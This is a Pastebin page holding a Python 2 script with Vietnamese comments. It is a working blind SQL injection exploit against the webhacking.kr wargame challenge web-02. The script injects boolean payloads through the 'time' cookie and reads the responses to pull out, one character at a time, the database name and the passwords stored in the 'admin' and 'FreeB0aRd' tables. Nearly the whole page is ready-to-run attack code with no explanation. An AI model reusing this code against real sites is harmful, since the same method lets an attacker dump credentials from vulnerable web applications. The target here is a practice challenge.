API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 12th, 2017
232
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.65 KB | None | 0 0
raw download clone embed print report
  1. import re,urllib, urllib2
  2.  
  3. url = "http://webhacking.kr/challenge/web/web-02/"
  4. cookie = "PHPSESSID" #Thêm vào PHPSESSID của bạn
  5. time = "1507748649"
  6. lengthDatabase=0
  7. MSG_OK="2070-01-01 09:00:01"
  8. print "***************************************************************************"
  9. print " SQL BLIND COOKIE "
  10. print " Author: phantom0305 "
  11. print "***************************************************************************"
  12.  
  13. def SolveLengthDatabase():
  14. print "Dang tim chieu dai database.."
  15. for i in range (0,100):
  16. try:
  17. req = urllib2.Request(url)
  18. payload = "1507748649 and length(database())=%d" %i
  19. COOKIE = "time=%s; PHPSESSID=%s;"%(payload,cookie)
  20. #print COOKIE
  21. req.add_header('Cookie',COOKIE) #Add cookie dang nhap.
  22. resp = urllib2.urlopen(req);
  23. content = resp.read()
  24. if MSG_OK in content: #Kiem tra chuoi co trong content khong khi truy van dung.
  25. lengthDB= i
  26. break
  27. except urllib2.URLError as e:
  28. print e
  29. return lengthDB
  30.  
  31. lengthDatabase = SolveLengthDatabase()
  32. print "Chieu Dai cua DATABASE la:%d"%lengthDatabase
  33. print "***************************************************************************"
  34. nameDatabase=""
  35. def NameDatabase():
  36. global nameDatabase
  37. global lengthDatabase
  38. print "Dang tim Ten DATABASE.. "
  39. for i in range(1,lengthDatabase+1):
  40. for j in range (33,126):
  41. try:
  42. req = urllib2.Request(url)
  43. payload ="1507748649 and ascii(substring(database(),%d,1))=%d"%(i,j)
  44. COOKIE = "time=%s; PHPSESSID=%s"%(payload,cookie)
  45. req.add_header('Cookie',COOKIE)
  46. resp = urllib2.urlopen(req)
  47. content = resp.read()
  48. if MSG_OK in content:
  49. print chr(j)
  50. nameDatabase = nameDatabase + chr(j)
  51. break
  52. except urllib2.URLError as e:
  53. print e
  54. return nameDatabase
  55.  
  56. nameDatabase=NameDatabase()
  57.  
  58. print "Ten Database: %s"%nameDatabase
  59. print "***************************************************************************"
  60.  
  61. def findLengthPassword1():
  62. print "Dang tim length password admin.. "
  63. for i in range(1,50):
  64. try:
  65. req = urllib2.Request(url)
  66. payload="1507748649 and (select length(password) from admin) =%d"%(i)
  67. COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
  68. req.add_header('Cookie',COOKIE)
  69. resp = urllib2.urlopen(req)
  70. content = resp.read()
  71. if MSG_OK in content:
  72. print str(i)
  73. break
  74. except urllib2.URLError as e:
  75. print e
  76. return i
  77. lengthPassadmin =findLengthPassword1()
  78. print "Chieu dai password admin = %d"%lengthPassadmin
  79. print "***************************************************************************"
  80.  
  81. def findPassword1():
  82. global lengthPassadmin
  83. passwordAdmin = ""
  84. print "Dang tim password admin.. "
  85. for i in range(1,lengthPassadmin+1):
  86. for k in range(33,126):
  87. try:
  88. req = urllib2.Request(url)
  89. #print "i=%d j=%d" %(i,k)
  90. payload="1507748649 and (select ascii(substring(password,%d,1)) from admin) = %d"%(i,k)
  91. COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
  92. req.add_header('Cookie',COOKIE)
  93. resp = urllib2.urlopen(req)
  94. content = resp.read()
  95. #print content
  96. if MSG_OK in content:
  97. passwordAdmin+= chr(k)
  98. print passwordAdmin
  99. break
  100. except urllib2.URLError as e:
  101. print e
  102. return passwordAdmin
  103. passAdmin=findPassword1()
  104. print "PASSWORD cua admin la: %s"%passAdmin
  105.  
  106. def findLengthPassword2():
  107. print "Dang tim length password FreeB0aRd.. "
  108. for i in range(1,50):
  109. try:
  110. req = urllib2.Request(url)
  111. payload="1507748649 and (select length(password) from FreeB0aRd) =%d"%(i)
  112. COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
  113. req.add_header('Cookie',COOKIE)
  114. resp = urllib2.urlopen(req)
  115. content = resp.read()
  116. if MSG_OK in content:
  117. print str(i)
  118. break
  119. except urllib2.URLError as e:
  120. print e
  121. return i
  122. lengthPassFreeB0aRd =findLengthPassword2()
  123.  
  124.  
  125. def findPassword2():
  126. global lengthPassFreeB0aRd
  127. passwordFreeB0aRd = ""
  128. print "Dang tim password FreeB0aRd.. "
  129. for i in range(1,lengthPassFreeB0aRd+1):
  130. for k in range(33,126):
  131. try:
  132. req = urllib2.Request(url)
  133. #print "i=%d j=%d" %(i,k)
  134. payload="1507748649 and (select ascii(substring(password,%d,1)) from FreeB0aRd) = %d"%(i,k)
  135. COOKIE ="time=%s; PHPSESSID=%s"%(payload,cookie)
  136. req.add_header('Cookie',COOKIE)
  137. resp = urllib2.urlopen(req)
  138. content = resp.read()
  139. #print content
  140. if MSG_OK in content:
  141. passwordFreeB0aRd+= chr(k)
  142. print passwordFreeB0aRd
  143. break
  144. except urllib2.URLError as e:
  145. print e
  146. return passwordFreeB0aRd
  147. passFreeB0aRd=findPassword2()
  148. print "Pass cua bang FreeB0aRd: %s" %passFreeB0aRd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!